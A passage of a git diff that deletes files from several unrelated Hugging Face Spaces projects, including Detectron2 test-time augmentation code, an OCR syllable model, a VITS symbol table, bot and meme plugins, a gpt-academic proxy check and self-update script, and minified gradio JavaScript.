(GeneralizedRCNN): a GeneralizedRCNN to apply TTA on. - tta_mapper (callable): takes a dataset dict and returns a list of - augmented versions of the dataset dict. Defaults to - `DatasetMapperTTA(cfg)`. - batch_size (int): batch the augmented images into this batch size for inference. - """ - super().__init__() - if isinstance(model, DistributedDataParallel): - model = model.module - assert isinstance( - model, GeneralizedRCNN - ), "TTA is only supported on GeneralizedRCNN. Got a model of type {}".format(type(model)) - self.cfg = cfg.clone() - assert not self.cfg.MODEL.KEYPOINT_ON, "TTA for keypoint is not supported yet" - assert ( - not self.cfg.MODEL.LOAD_PROPOSALS - ), "TTA for pre-computed proposals is not supported yet" - - self.model = model - - if tta_mapper is None: - tta_mapper = DatasetMapperTTA(cfg) - self.tta_mapper = tta_mapper - self.batch_size = batch_size - - @contextmanager - def _turn_off_roi_heads(self, attrs): - """ - Open a context where some heads in `model.roi_heads` are temporarily turned off. - Args: - attr (list[str]): the attribute in `model.roi_heads` which can be used - to turn off a specific head, e.g., "mask_on", "keypoint_on". - """ - roi_heads = self.model.roi_heads - old = {} - for attr in attrs: - try: - old[attr] = getattr(roi_heads, attr) - except AttributeError: - # The head may not be implemented in certain ROIHeads - pass - - if len(old.keys()) == 0: - yield - else: - for attr in old.keys(): - setattr(roi_heads, attr, False) - yield - for attr in old.keys(): - setattr(roi_heads, attr, old[attr]) - - def _batch_inference(self, batched_inputs, detected_instances=None): - """ - Execute inference on a list of inputs, - using batch size = self.batch_size, instead of the length of the list. - - Inputs & outputs have the same format as :meth:`GeneralizedRCNN.inference` - """ - if detected_instances is None: - detected_instances = [None] * len(batched_inputs) - - outputs = [] - inputs, instances = [], [] - for idx, input, instance in zip(count(), batched_inputs, detected_instances): - inputs.append(input) - instances.append(instance) - if len(inputs) == self.batch_size or idx == len(batched_inputs) - 1: - outputs.extend( - self.model.inference( - inputs, - instances if instances[0] is not None else None, - do_postprocess=False, - ) - ) - inputs, instances = [], [] - return outputs - - def __call__(self, batched_inputs): - """ - Same input/output format as :meth:`GeneralizedRCNN.forward` - """ - - def _maybe_read_image(dataset_dict): - ret = copy.copy(dataset_dict) - if "image" not in ret: - image = read_image(ret.pop("file_name"), self.model.input_format) - image = torch.from_numpy(np.ascontiguousarray(image.transpose(2, 0, 1))) # CHW - ret["image"] = image - if "height" not in ret and "width" not in ret: - ret["height"] = image.shape[1] - ret["width"] = image.shape[2] - return ret - - return [self._inference_one_image(_maybe_read_image(x)) for x in batched_inputs] - - def _inference_one_image(self, input): - """ - Args: - input (dict): one dataset dict with "image" field being a CHW tensor - - Returns: - dict: one output dict - """ - orig_shape = (input["height"], input["width"]) - augmented_inputs, tfms = self._get_augmented_inputs(input) - # Detect boxes from all augmented versions - with self._turn_off_roi_heads(["mask_on", "keypoint_on"]): - # temporarily disable roi heads - all_boxes, all_scores, all_classes = self._get_augmented_boxes(augmented_inputs, tfms) - # merge all detected boxes to obtain final predictions for boxes - merged_instances = self._merge_detections(all_boxes, all_scores, all_classes, orig_shape) - - if self.cfg.MODEL.MASK_ON: - # Use the detected boxes to obtain masks - augmented_instances = self._rescale_detected_boxes( - augmented_inputs, merged_instances, tfms - ) - # run forward on the detected boxes - outputs = self._batch_inference(augmented_inputs, augmented_instances) - # Delete now useless variables to avoid being out of memory - del augmented_inputs, augmented_instances - # average the predictions - merged_instances.pred_masks = self._reduce_pred_masks(outputs, tfms) - merged_instances = detector_postprocess(merged_instances, *orig_shape) - return {"instances": merged_instances} - else: - return {"instances": merged_instances} - - def _get_augmented_inputs(self, input): - augmented_inputs = self.tta_mapper(input) - tfms = [x.pop("transforms") for x in augmented_inputs] - return augmented_inputs, tfms - - def _get_augmented_boxes(self, augmented_inputs, tfms): - # 1: forward with all augmented images - outputs = self._batch_inference(augmented_inputs) - # 2: union the results - all_boxes = [] - all_scores = [] - all_classes = [] - for output, tfm in zip(outputs, tfms): - # Need to inverse the transforms on boxes, to obtain results on original image - pred_boxes = output.pred_boxes.tensor - original_pred_boxes = tfm.inverse().apply_box(pred_boxes.cpu().numpy()) - all_boxes.append(torch.from_numpy(original_pred_boxes).to(pred_boxes.device)) - - all_scores.extend(output.scores) - all_classes.extend(output.pred_classes) - all_boxes = torch.cat(all_boxes, dim=0) - return all_boxes, all_scores, all_classes - - def _merge_detections(self, all_boxes, all_scores, all_classes, shape_hw): - # select from the union of all results - num_boxes = len(all_boxes) - num_classes = self.cfg.MODEL.ROI_HEADS.NUM_CLASSES - # +1 because fast_rcnn_inference expects background scores as well - all_scores_2d = torch.zeros(num_boxes, num_classes + 1, device=all_boxes.device) - for idx, cls, score in zip(count(), all_classes, all_scores): - all_scores_2d[idx, cls] = score - - merged_instances, _ = fast_rcnn_inference_single_image( - all_boxes, - all_scores_2d, - shape_hw, - 1e-8, - self.cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST, - self.cfg.TEST.DETECTIONS_PER_IMAGE, - ) - - return merged_instances - - def _rescale_detected_boxes(self, augmented_inputs, merged_instances, tfms): - augmented_instances = [] - for input, tfm in zip(augmented_inputs, tfms): - # Transform the target box to the augmented image's coordinate space - pred_boxes = merged_instances.pred_boxes.tensor.cpu().numpy() - pred_boxes = torch.from_numpy(tfm.apply_box(pred_boxes)) - - aug_instances = Instances( - image_size=input["image"].shape[1:3], - pred_boxes=Boxes(pred_boxes), - pred_classes=merged_instances.pred_classes, - scores=merged_instances.scores, - ) - augmented_instances.append(aug_instances) - return augmented_instances - - def _reduce_pred_masks(self, outputs, tfms): - # Should apply inverse transforms on masks. - # We assume only resize & flip are used. pred_masks is a scale-invariant - # representation, so we handle flip specially - for output, tfm in zip(outputs, tfms): - if any(isinstance(t, HFlipTransform) for t in tfm.transforms): - output.pred_masks = output.pred_masks.flip(dims=[3]) - all_pred_masks = torch.stack([o.pred_masks for o in outputs], dim=0) - avg_pred_masks = torch.mean(all_pred_masks, dim=0) - return avg_pred_masks diff --git a/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md b/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md deleted file mode 100644 index 20a4085aa4cc98bef7c06f2b088b750fb3f1e7ce..0000000000000000000000000000000000000000 --- a/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: README -emoji: 🏢 -colorFrom: indigo -colorTo: blue -sdk: static -pinned: true -license: mit ---- - -[![](https://mermaid.ink/img/pako:eNqVl81u00AUhV9lNIhdWtkz_kdiQWpVVYJUNVlBkDXY03SIY0e20za0XbBhwQokFuwq8RA8F4_A_KTNxFIk7qo55565dzxfGo3vcF4XHCd43rDVFZq-mVUIpe9nOF3Wn8QpW3I0LFnbzvAHXUFHR6_vZzjLRCW6LJvhe3Q2kvEzKQUrxWeOeJU3m1Un6ipb8A1iVYHmsk9W1vNel7ZjTZepouozOZV9JspCp9ray8rV2arhhchVZ5Ufn8v8uJ6jc8veW1OIdlWyjZ6QNbxdl12rVp5cyJUnpqhnoYun4t76vK6uudwhV2eRdXW2YIuuvhaLTD6Ueribuil0x6E6g6GJI310qKvRaBvXZzB6ju_N6Boxn_Mmy1lZqiMSueo3Hct-U1NCQ1lCY1PSa9v1R4NLT1KO7OfKFX8ff33bZqRDjPNl51DjfN05nnEed45vnJ87JzDO750TGufHzomM833nxMb5s3V4Vag_w5F6brlbWxBbUFt4tvBtEdgitEVki1iJ6dga-iSILagtPFv4tghsEdoisoUemrpbwrHzUiE1A1PSc_XklPZcvYXU67l6L6nfc_Wm0qDn6t2lYc_V20yjnmv2G2_dC_ltrZe64B4qkEMFeqjgHSr4hwrBoUJ4qKCfrhTVYtJtSo4c1HZNveDJC8LzInQHRh7diKK7Ssjq9tV-3gXmCTBPgXkPmPeB-QCYD4H5CJiPobzAgKGEXShiF8rYhUJ2oZRdKGYXytmFgnahpAmUNAH_L0NJEyhpAiVNoKQJlDSBkiZQ0gRKmkJJUyhpCv7ZhpKmUNIUSppCSVMoaQolTf-HNB7gJW-WTBTyjeNONZAX4CuuLvuJ_FjwSyav4TM8qx5klK27erKpcpx0zZoP8HpVsI6fCCYvv8t9My1EVzc4uWRlK80Vq97V9XNGSpzc4VucxPSYel7kByQgxAkdOsAbnHj-se86NPB8SrzQCR8G-LNe7hzHTuz6jk8iQjw_iAaY60lvzUuTfnd6-AdpI06c?type=png)](https://mermaid.live/edit#pako:eNqVl81u00AUhV9lNIhdWtkz_kdiQWpVVYJUNVlBkDXY03SIY0e20za0XbBhwQokFuwq8RA8F4_A_KTNxFIk7qo55565dzxfGo3vcF4XHCd43rDVFZq-mVUIpe9nOF3Wn8QpW3I0LFnbzvAHXUFHR6_vZzjLRCW6LJvhe3Q2kvEzKQUrxWeOeJU3m1Un6ipb8A1iVYHmsk9W1vNel7ZjTZepouozOZV9JspCp9ray8rV2arhhchVZ5Ufn8v8uJ6jc8veW1OIdlWyjZ6QNbxdl12rVp5cyJUnpqhnoYun4t76vK6uudwhV2eRdXW2YIuuvhaLTD6Ueribuil0x6E6g6GJI310qKvRaBvXZzB6ju_N6Boxn_Mmy1lZqiMSueo3Hct-U1NCQ1lCY1PSa9v1R4NLT1KO7OfKFX8ff33bZqRDjPNl51DjfN05nnEed45vnJ87JzDO750TGufHzomM833nxMb5s3V4Vag_w5F6brlbWxBbUFt4tvBtEdgitEVki1iJ6dga-iSILagtPFv4tghsEdoisoUemrpbwrHzUiE1A1PSc_XklPZcvYXU67l6L6nfc_Wm0qDn6t2lYc_V20yjnmv2G2_dC_ltrZe64B4qkEMFeqjgHSr4hwrBoUJ4qKCfrhTVYtJtSo4c1HZNveDJC8LzInQHRh7diKK7Ssjq9tV-3gXmCTBPgXkPmPeB-QCYD4H5CJiPobzAgKGEXShiF8rYhUJ2oZRdKGYXytmFgnahpAmUNAH_L0NJEyhpAiVNoKQJlDSBkiZQ0gRKmkJJUyhpCv7ZhpKmUNIUSppCSVMoaQolTf-HNB7gJW-WTBTyjeNONZAX4CuuLvuJ_FjwSyav4TM8qx5klK27erKpcpx0zZoP8HpVsI6fCCYvv8t9My1EVzc4uWRlK80Vq97V9XNGSpzc4VucxPSYel7kByQgxAkdOsAbnHj-se86NPB8SrzQCR8G-LNe7hzHTuz6jk8iQjw_iAaY60lvzUuTfnd6-AdpI06c) \ No newline at end of file diff --git a/spaces/Chomkwoy/Nilkessye/syllable_model.py b/spaces/Chomkwoy/Nilkessye/syllable_model.py deleted file mode 100644 index a3bc6ac43adbc30432eacc526654214059433b43..0000000000000000000000000000000000000000 --- a/spaces/Chomkwoy/Nilkessye/syllable_model.py +++ /dev/null @@ -1,55 +0,0 @@ -import torch -from torch.nn import CrossEntropyLoss - -from transformers import VisionEncoderDecoderModel -from transformers import TrOCRProcessor, RobertaTokenizerFast - - -class SyllableRecognizer: - def __init__(self, model=None): - if model is None: - self.model: VisionEncoderDecoderModel = VisionEncoderDecoderModel.from_pretrained( - "ckpt-syllable-3fonts-surrounded-real" - ) - else: - self.model: VisionEncoderDecoderModel = model - - self.processor = TrOCRProcessor.from_pretrained("Chomkwoy/nilkessye_tokenizer") - - def _preprocess_images(self, images): - pixel_values = [] - for image in images: - pixel_values.append(self.processor(image, return_tensors="pt").pixel_values) - pixel_values = torch.cat(pixel_values, dim=0) - return pixel_values - - def recognize(self, images): - pixel_values = self._preprocess_images(images) - - generated_ids = self.model.generate( - pixel_values.to(self.model.device), - max_new_tokens=13, - early_stopping=True, - eos_token_id=self.processor.tokenizer.eos_token_id - ) - generated_text = self.processor.batch_decode(generated_ids, skip_special_tokens=True) - return generated_text - - def loss(self, images, text): - pixel_values = self._preprocess_images(images) - tokens = self.processor.tokenizer(text, padding=True, return_tensors='pt') - labels = tokens['input_ids'] - labels[labels == self.processor.tokenizer.pad_token_id] = -100 - - with torch.no_grad(): - outputs = self.model( - pixel_values=pixel_values.to(self.model.device), - labels=labels.to(self.model.device), - return_dict=True, - ) - - logits = outputs.logits.cpu() - loss_fct = CrossEntropyLoss(reduction='none') - loss = loss_fct(logits.permute(0, 2, 1), labels) - - return loss.sum(-1) diff --git a/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py b/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py deleted file mode 100644 index edfbd24247be8c757275ce80b9ec27a0ffa808f3..0000000000000000000000000000000000000000 --- a/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py +++ /dev/null @@ -1,39 +0,0 @@ -''' -Defines the set of symbols used in text input to the model. -''' - -'''# japanese_cleaners -_pad = '_' -_punctuation = ',.!?-' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧ↓↑ ' -''' - -'''# japanese_cleaners2 -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧʦ↓↑ ' -''' - -'''# korean_cleaners -_pad = '_' -_punctuation = ',.!?…~' -_letters = 'ㄱㄴㄷㄹㅁㅂㅅㅇㅈㅊㅋㅌㅍㅎㄲㄸㅃㅆㅉㅏㅓㅗㅜㅡㅣㅐㅔ ' -''' - -'''# chinese_cleaners -_pad = '_' -_punctuation = ',。!?—…' -_letters = 'ㄅㄆㄇㄈㄉㄊㄋㄌㄍㄎㄏㄐㄑㄒㄓㄔㄕㄖㄗㄘㄙㄚㄛㄜㄝㄞㄟㄠㄡㄢㄣㄤㄥㄦㄧㄨㄩˉˊˇˋ˙ ' -''' - -# zh_ja_mixture_cleaners -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijklmnoprstuvwyzʃʧʦɯɹəɥ⁼ʰ`→↓↑ ' - - -# Export all symbols: -symbols = [_pad] + list(_punctuation) + list(_letters) - -# Special symbol ids -SPACE_ID = symbols.index(" ") \ No newline at end of file diff --git a/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js b/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js deleted file mode 100644 index f77786549d97f6c47b41612ae675b9198de3872b..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js +++ /dev/null @@ -1,27 +0,0 @@ -import { App, Common, Version } from '#miao' - -let app = App.init({ - id: 'version', - name: '版本', - desc: '版本' -}) - -app.reg({ - version: { - rule: /^#版本$/, - desc: '【#帮助】 版本介绍', - fn: async function (e) { - let { changelogs, currentVersion } = Version.readLogFile('root') - return await Common.render('help/version-info', { - currentVersion, - changelogs, - name: 'TRSS-Yunzai', - elem: 'cryo', - pluginName: false, - pluginVersion: false - }, { e, scale: 1.2 }) - } - } -}) - -export const version = app.v3App() diff --git a/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py b/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py deleted file mode 100644 index b28aa8e58319f5b20dd3594a7678137f240bf851..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -from pathlib import Path -from typing import List - -from pil_utils import BuildImage - -from meme_generator import add_meme - -img_dir = Path(__file__).parent / "images" - - -def cover_face(images: List[BuildImage], texts, args): - points = ((15, 15), (448, 0), (445, 456), (0, 465)) - img = images[0].convert("RGBA").square().resize((450, 450)).perspective(points) - frame = BuildImage.open(img_dir / "0.png") - frame.paste(img, (120, 150), below=True) - return frame.save_jpg() - - -add_meme("cover_face", cover_face, min_images=1, max_images=1, keywords=["捂脸"]) diff --git a/spaces/Cong723/gpt-academic-public/check_proxy.py b/spaces/Cong723/gpt-academic-public/check_proxy.py deleted file mode 100644 index 754b5d36b0c39d29eb6f4dcb8ed88355bcb6335f..0000000000000000000000000000000000000000 --- a/spaces/Cong723/gpt-academic-public/check_proxy.py +++ /dev/null @@ -1,151 +0,0 @@ - -def check_proxy(proxies): - import requests - proxies_https = proxies['https'] if proxies is not None else '无' - try: - response = requests.get("https://ipapi.co/json/", - proxies=proxies, timeout=4) - data = response.json() - print(f'查询代理的地理位置,返回的结果是{data}') - if 'country_name' in data: - country = data['country_name'] - result = f"代理配置 {proxies_https}, 代理所在地:{country}" - elif 'error' in data: - result = f"代理配置 {proxies_https}, 代理所在地:未知,IP查询频率受限" - print(result) - return result - except: - result = f"代理配置 {proxies_https}, 代理所在地查询超时,代理可能无效" - print(result) - return result - - -def backup_and_download(current_version, remote_version): - """ - 一键更新协议:备份和下载 - """ - from toolbox import get_conf - import shutil - import os - import requests - import zipfile - os.makedirs(f'./history', exist_ok=True) - backup_dir = f'./history/backup-{current_version}/' - new_version_dir = f'./history/new-version-{remote_version}/' - if os.path.exists(new_version_dir): - return new_version_dir - os.makedirs(new_version_dir) - shutil.copytree('./', backup_dir, ignore=lambda x, y: ['history']) - proxies, = get_conf('proxies') - r = requests.get( - 'https://github.com/binary-husky/chatgpt_academic/archive/refs/heads/master.zip', proxies=proxies, stream=True) - zip_file_path = backup_dir+'/master.zip' - with open(zip_file_path, 'wb+') as f: - f.write(r.content) - dst_path = new_version_dir - with zipfile.ZipFile(zip_file_path, "r") as zip_ref: - for zip_info in zip_ref.infolist(): - dst_file_path = os.path.join(dst_path, zip_info.filename) - if os.path.exists(dst_file_path): - os.remove(dst_file_path) - zip_ref.extract(zip_info, dst_path) - return new_version_dir - - -def patch_and_restart(path): - """ - 一键更新协议:覆盖和重启 - """ - from distutils import dir_util - import shutil - import os - import sys - import time - import glob - from colorful import print亮黄, print亮绿, print亮红 - # if not using config_private, move origin config.py as config_private.py - if not os.path.exists('config_private.py'): - print亮黄('由于您没有设置config_private.py私密配置,现将您的现有配置移动至config_private.py以防止配置丢失,', - '另外您可以随时在history子文件夹下找回旧版的程序。') - shutil.copyfile('config.py', 'config_private.py') - path_new_version = glob.glob(path + '/*-master')[0] - dir_util.copy_tree(path_new_version, './') - print亮绿('代码已经更新,即将更新pip包依赖……') - for i in reversed(range(5)): time.sleep(1); print(i) - try: - import subprocess - subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt']) - except: - print亮红('pip包依赖安装出现问题,需要手动安装新增的依赖库 `python -m pip install -r requirements.txt`,然后在用常规的`python main.py`的方式启动。') - print亮绿('更新完成,您可以随时在history子文件夹下找回旧版的程序,5s之后重启') - print亮红('假如重启失败,您可能需要手动安装新增的依赖库 `python -m pip install -r requirements.txt`,然后在用常规的`python main.py`的方式启动。') - print(' ------------------------------ -----------------------------------') - for i in reversed(range(8)): time.sleep(1); print(i) - os.execl(sys.executable, sys.executable, *sys.argv) - - -def get_current_version(): - import json - try: - with open('./version', 'r', encoding='utf8') as f: - current_version = json.loads(f.read())['version'] - except: - current_version = "" - return current_version - - -def auto_update(): - """ - 一键更新协议:查询版本和用户意见 - """ - try: - from toolbox import get_conf - import requests - import time - import json - proxies, = get_conf('proxies') - response = requests.get( - "https://raw.githubusercontent.com/binary-husky/chatgpt_academic/master/version", proxies=proxies, timeout=5) - remote_json_data = json.loads(response.text) - remote_version = remote_json_data['version'] - if remote_json_data["show_feature"]: - new_feature = "新功能:" + remote_json_data["new_feature"] - else: - new_feature = "" - with open('./version', 'r', encoding='utf8') as f: - current_version = f.read() - current_version = json.loads(current_version)['version'] - if (remote_version - current_version) >= 0.01: - from colorful import print亮黄 - print亮黄( - f'\n新版本可用。新版本:{remote_version},当前版本:{current_version}。{new_feature}') - print('(1)Github更新地址:\nhttps://github.com/binary-husky/chatgpt_academic\n') - user_instruction = input('(2)是否一键更新代码(Y+回车=确认,输入其他/无输入+回车=不更新)?') - if user_instruction in ['Y', 'y']: - path = backup_and_download(current_version, remote_version) - try: - patch_and_restart(path) - except: - print('更新失败。') - else: - print('自动更新程序:已禁用') - return - else: - return - except: - print('自动更新程序:已禁用') - -def warm_up_modules(): - print('正在执行一些模块的预热...') - from request_llm.bridge_all import model_info - enc = model_info["gpt-3.5-turbo"]['tokenizer'] - enc.encode("模块预热", disallowed_special=()) - enc = model_info["gpt-4"]['tokenizer'] - enc.encode("模块预热", disallowed_special=()) - -if __name__ == '__main__': - import os - os.environ['no_proxy'] = '*' # 避免代理网络产生意外污染 - from toolbox import get_conf - proxies, = get_conf('proxies') - check_proxy(proxies) diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js deleted file mode 100644 index b2a4d8a9afe817495020c2e5efcdd32ee9b4f0cf..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js +++ /dev/null @@ -1,9 +0,0 @@ -import{c as ar,a as ir,g as cr}from"./module-a3cf0cc4.js";import{g as nn}from"./index-3370be2a.js";const xt=new Set,ur=ar({encode:({call:e})=>async(t,n)=>{const r=await e("encode",{encoderId:t,timeslice:n});return xt.delete(t),r},instantiate:({call:e})=>async(t,n)=>{const r=ir(xt),o=await e("instantiate",{encoderId:r,mimeType:t,sampleRate:n});return{encoderId:r,port:o}},register:({call:e})=>t=>e("register",{port:t},[t])}),lr=e=>{const t=new Worker(e);return ur(t)},dr=`(()=>{var e={775:function(e,t,r){!function(e,t,r,n){"use strict";function o(e){return e&&"object"==typeof e&&"default"in e?e:{default:e}}var a=o(t),s=o(r),i=o(n),c=function(e,t){return void 0===t?e:t.reduce((function(e,t){if("capitalize"===t){var r=e.charAt(0).toUpperCase(),n=e.slice(1);return"".concat(r).concat(n)}return"dashify"===t?s.default(e):"prependIndefiniteArticle"===t?"".concat(i.default(e)," ").concat(e):e}),e)},u=function(e){var t=e.name+e.modifiers.map((function(e){return"\\\\.".concat(e,"\\\\(\\\\)")})).join("");return new RegExp("\\\\$\\\\{".concat(t,"}"),"g")},l=function(e,t){for(var r=/\\\${([^.}]+)((\\.[^(]+\\(\\))*)}/g,n=[],o=r.exec(e);null!==o;){var s={modifiers:[],name:o[1]};if(void 0!==o[3])for(var i=/\\.[^(]+\\(\\)/g,l=i.exec(o[2]);null!==l;)s.modifiers.push(l[0].slice(1,-2)),l=i.exec(o[2]);n.push(s),o=r.exec(e)}var d=n.reduce((function(e,r){return e.map((function(e){return"string"==typeof e?e.split(u(r)).reduce((function(e,n,o){return 0===o?[n]:r.name in t?[].concat(a.default(e),[c(t[r.name],r.modifiers),n]):[].concat(a.default(e),[function(e){return c(e[r.name],r.modifiers)},n])}),[]):[e]})).reduce((function(e,t){return[].concat(a.default(e),a.default(t))}),[])}),[e]);return function(e){return d.reduce((function(t,r){return[].concat(a.default(t),"string"==typeof r?[r]:[r(e)])}),[]).join("")}},d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},r=void 0===e.code?void 0:l(e.code,t),n=void 0===e.message?void 0:l(e.message,t);function o(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},o=arguments.length>1?arguments[1]:void 0,a=void 0===o&&(t instanceof Error||void 0!==t.code&&"Exception"===t.code.slice(-9))?{cause:t,missingParameters:{}}:{cause:o,missingParameters:t},s=a.cause,i=a.missingParameters,c=void 0===n?new Error:new Error(n(i));return null!==s&&(c.cause=s),void 0!==r&&(c.code=r(i)),void 0!==e.status&&(c.status=e.status),c}return o};e.compile=d,Object.defineProperty(e,"__esModule",{value:!0})}(t,r(106),r(881),r(507))},881:e=>{"use strict";e.exports=(e,t)=>{if("string"!=typeof e)throw new TypeError("expected a string");return e.trim().replace(/([a-z])([A-Z])/g,"$1-$2").replace(/\\W/g,(e=>/[À-ž]/.test(e)?e:"-")).replace(/^-+|-+$/g,"").replace(/-{2,}/g,(e=>t&&t.condense?"-":e)).toLowerCase()}},107:function(e,t){!function(e){"use strict";var t=function(e){return function(t){var r=e(t);return t.add(r),r}},r=function(e){return function(t,r){return e.set(t,r),r}},n=void 0===Number.MAX_SAFE_INTEGER?9007199254740991:Number.MAX_SAFE_INTEGER,o=536870912,a=2*o,s=function(e,t){return function(r){var s=t.get(r),i=void 0===s?r.size:sn)throw new Error("Congratulations, you created a collection of unique numbers which uses all available integers!");for(;r.has(i);)i=Math.floor(Math.random()*n);return e(r,i)}},i=new WeakMap,c=r(i),u=s(c,i),l=t(u);e.addUniqueNumber=l,e.generateUniqueNumber=u,Object.defineProperty(e,"__esModule",{value:!0})}(t)},507:e=>{var t=function(e){var t,r,n=/\\w+/.exec(e);if(!n)return"an";var o=(r=n[0]).toLowerCase(),a=["honest","hour","hono"];for(t in a)if(0==o.indexOf(a[t]))return"an";if(1==o.length)return"aedhilmnorsx".indexOf(o)>=0?"an":"a";if(r.match(/(?!FJO|[HLMNS]Y.|RY[EO]|SQU|(F[LR]?|[HL]|MN?|N|RH?|S[CHKLMNPTVW]?|X(YL)?)[AEIOU])[FHLMNRSX][A-Z]/))return"an";var s=[/^e[uw]/,/^onc?e\\b/,/^uni([^nmd]|mo)/,/^u[bcfhjkqrst][aeiou]/];for(t=0;t=0?"an":"a":"aeiou".indexOf(o[0])>=0||o.match(/^y(b[lor]|cl[ea]|fere|gg|p[ios]|rou|tt)/)?"an":"a"};void 0!==e.exports?e.exports=t:window.indefiniteArticle=t},768:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r{var n=r(768);e.exports=function(e){if(Array.isArray(e))return n(e)},e.exports.__esModule=!0,e.exports.default=e.exports},642:e=>{e.exports=function(e){if("undefined"!=typeof Symbol&&null!=e[Symbol.iterator]||null!=e["@@iterator"])return Array.from(e)},e.exports.__esModule=!0,e.exports.default=e.exports},344:e=>{e.exports=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")},e.exports.__esModule=!0,e.exports.default=e.exports},106:(e,t,r)=>{var n=r(907),o=r(642),a=r(906),s=r(344);e.exports=function(e){return n(e)||o(e)||a(e)||s()},e.exports.__esModule=!0,e.exports.default=e.exports},906:(e,t,r)=>{var n=r(768);e.exports=function(e,t){if(e){if("string"==typeof e)return n(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);return"Object"===r&&e.constructor&&(r=e.constructor.name),"Map"===r||"Set"===r?Array.from(e):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?n(e,t):void 0}},e.exports.__esModule=!0,e.exports.default=e.exports}},t={};function r(n){var o=t[n];if(void 0!==o)return o.exports;var a=t[n]={exports:{}};return e[n].call(a.exports,a,a.exports,r),a.exports}(()=>{"use strict";var e=r(775);const t=-32603,n=-32602,o=-32601,a=(0,e.compile)({message:'The requested method called "\${method}" is not supported.',status:o}),s=(0,e.compile)({message:'The handler of the method called "\${method}" returned no required result.',status:t}),i=(0,e.compile)({message:'The handler of the method called "\${method}" returned an unexpected result.',status:t}),c=(0,e.compile)({message:'The specified parameter called "portId" with the given value "\${portId}" does not identify a port connected to this worker.',status:n}),u=(e,t)=>async r=>{let{data:{id:n,method:o,params:c}}=r;const u=t[o];try{if(void 0===u)throw a({method:o});const t=void 0===c?u():u(c);if(void 0===t)throw s({method:o});const r=t instanceof Promise?await t:t;if(null===n){if(void 0!==r.result)throw i({method:o})}else{if(void 0===r.result)throw i({method:o});const{result:t,transferables:a=[]}=r;e.postMessage({id:n,result:t},a)}}catch(t){const{message:r,status:o=-32603}=t;e.postMessage({error:{code:o,message:r},id:n})}};var l=r(107);const d=new Map,f=(e,t,r)=>({...t,connect:r=>{let{port:n}=r;n.start();const o=e(n,t),a=(0,l.generateUniqueNumber)(d);return d.set(a,(()=>{o(),n.close(),d.delete(a)})),{result:a}},disconnect:e=>{let{portId:t}=e;const r=d.get(t);if(void 0===r)throw c({portId:t.toString()});return r(),{result:null}},isSupported:async()=>{if(await new Promise((e=>{const t=new ArrayBuffer(0),{port1:r,port2:n}=new MessageChannel;r.onmessage=t=>{let{data:r}=t;return e(null!==r)},n.postMessage(t,[t])}))){const e=r();return{result:e instanceof Promise?await e:e}}return{result:!1}}}),p=function(e,t){let r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:()=>!0;const n=f(p,t,r),o=u(e,n);return e.addEventListener("message",o),()=>e.removeEventListener("message",o)},m=e=>{e.onmessage=null,e.close()},h=new WeakMap,g=new WeakMap,v=(e=>{const t=(r=e,{...r,connect:e=>{let{call:t}=e;return async()=>{const{port1:e,port2:r}=new MessageChannel,n=await t("connect",{port:e},[e]);return h.set(r,n),r}},disconnect:e=>{let{call:t}=e;return async e=>{const r=h.get(e);if(void 0===r)throw new Error("The given port is not connected.");await t("disconnect",{portId:r})}},isSupported:e=>{let{call:t}=e;return()=>t("isSupported")}});var r;return e=>{const r=(e=>{if(g.has(e))return g.get(e);const t=new Map;return g.set(e,t),t})(e);e.addEventListener("message",(e=>{let{data:t}=e;const{id:n}=t;if(null!==n&&r.has(n)){const{reject:e,resolve:o}=r.get(n);r.delete(n),void 0===t.error?o(t.result):e(new Error(t.error.message))}})),(e=>"function"==typeof e.start)(e)&&e.start();const n=function(t){let n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,o=arguments.length>2&&void 0!==arguments[2]?arguments[2]:[];return new Promise(((a,s)=>{const i=(0,l.generateUniqueNumber)(r);r.set(i,{reject:s,resolve:a}),null===n?e.postMessage({id:i,method:t},o):e.postMessage({id:i,method:t,params:n},o)}))},o=function(t,r){let n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:[];e.postMessage({id:null,method:t,params:r},n)};let a={};for(const[e,r]of Object.entries(t))a={...a,[e]:r({call:n,notify:o})};return{...a}}})({characterize:e=>{let{call:t}=e;return()=>t("characterize")},encode:e=>{let{call:t}=e;return(e,r)=>t("encode",{recordingId:e,timeslice:r})},record:e=>{let{call:t}=e;return 